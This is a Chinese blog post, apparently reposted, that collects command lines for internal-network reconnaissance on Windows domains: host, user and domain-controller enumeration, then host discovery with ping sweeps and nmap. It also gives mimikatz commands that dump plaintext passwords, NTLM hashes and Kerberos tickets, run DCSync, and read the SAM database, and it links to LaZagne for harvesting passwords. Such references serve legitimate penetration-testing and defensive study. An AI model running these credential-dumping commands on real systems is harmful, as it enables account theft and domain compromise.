常用命令行收集内网信息

基础信息收集

收集计算机基本信息判断当前电脑的是在内网扮演什么角色

获取计算机的详细信息

  systeminfo #详细信息

image.png

查看计算机启动服务

  net start #查看启动服务

image.png

查看计算机进程列表

  tasklist

image.png

查看计算机计划任务

  schtasks #查看计划任务

image.png

网络信息收集

了解当前服务器的网络接口信息,为判断当前角色,功能,网络架构做准备

判断存在域-dns

  ipconfig /all #判断存在域-dns

image.png

判断是否存在域

  net view /domain 判断是否存在域

判断域控

   
  net time /domain #判断域控

image.png

查看当前网络开放的端口

  netstat -ano #当前网络端口开放

image.png

追踪来源地址

  nslookup 域名

用户信息收集

了解当前计算机或域环境下的用户及用户组信息,便于后期利用凭据进行测试

  系统默认常见用户身份:
  Domain Admins:域管理员(默认对域控制器有完全控制权)
  Domain Computers:域内机器
  Domain Controllers:域控制器
  Domain Guest:域访客,权限低
  Domain Users:域用户
  Enterprise Admins:企业系统管理员用户(默认对域控制器有完全控制权)

相关用户收集操作命令

查看用户权限

  whoami /all #用户权限

image.png

查看登入信息

  #登入信息
  net config workstation

image.png

查看本地用户组

  net localgroup #本地用户组

image.png

查看本机用户

  net user #本机用户

image.png

获取域内用户信息

  net user /domain #获取域内用户信息

image.png

获取域内用户组信息

  net group /domain #获取域内用户组信息

image.png

查看域用户详细信息

  wmic useraccount get /all #涉及域用户详细信息

image.png

查询域管理员账户

  net group "Domain Admins" /domain #查询域管理员账户

image.png

查询域管理员用户组

  net group "Enterprise Admins" /domain #查询域管理员用户组

image.png

查询域控制器

  net group "Domain Controllers" /domain

凭借信息收集

收集各种密文,明文,口令等,为后续横向渗透做好测试准备
计算机用户哈希HASH,明文获取-mimikatz(win) ,mimipenguin(linux)

工具-mimikatz

安装:https://github.com/gentilkiwi/mimikatz
双击运行
image.png

  privilege::debug #获取权限
   

image.png

sekurlsa模块
  sekurlsa::logonpasswords #抓取登入密码

image.png

  sekurlsa::msv #抓取用户NTLM哈希
  sekurlsa::minidump lsass.dmp #加载dmp文件
  sekurlsa::logonpasswords full #并导出其中的明文密码
  sekurlsa::tickets /export #导出lsass.exe进程中所有的票据
kerberos模块
  列出系统中的票据
  kerberos::list
  kerberos::tgt
   
  清除系统中的票据
  kerberos::purge
   
  导入票据到系统中
  kerberos::ptc 票据路径
lsadump模块
  在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等
  lsadump::dcsync /domain:kevin.com /user:root
   
  (在域控上执行)读取所有域用户的哈希
  lsadump::lsa /patch
   
  从sam.hive和system.hive文件中获得NTLM Hash
  lsadump::sam /sam:sam.hive /system:system.hive
   
  从本地SAM文件中读取密码哈希
  token::elevate
  lsadump::sam

工具-LaZagen
https://github.com/AlessandroZ/LaZagne
一键抓取目标机器上的所有明文密码
工具-XenArmox

探针主机域控架构服务

为后续横向思路做准备,针对应用,协议等各类攻击手法

探针域控制器名及地址信息

  net time /domain nslookup ping

探针域内存活主机及地址信息

本机命令探测主机存活

  for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.111.%I | findstr "TTL=""
   

nbtscan-第三方工具

  nbtscan 192.168.3.0/24

namp

  nmap -sn 192.168.3.0/24 #ping扫描,即主机发现

 

出处:https://www.cnblogs.com/Breeze777/p/17627326.html

posted on 2023-08-14 10:58  jack_Meng  阅读(60)  评论(0编辑  收藏  举报

导航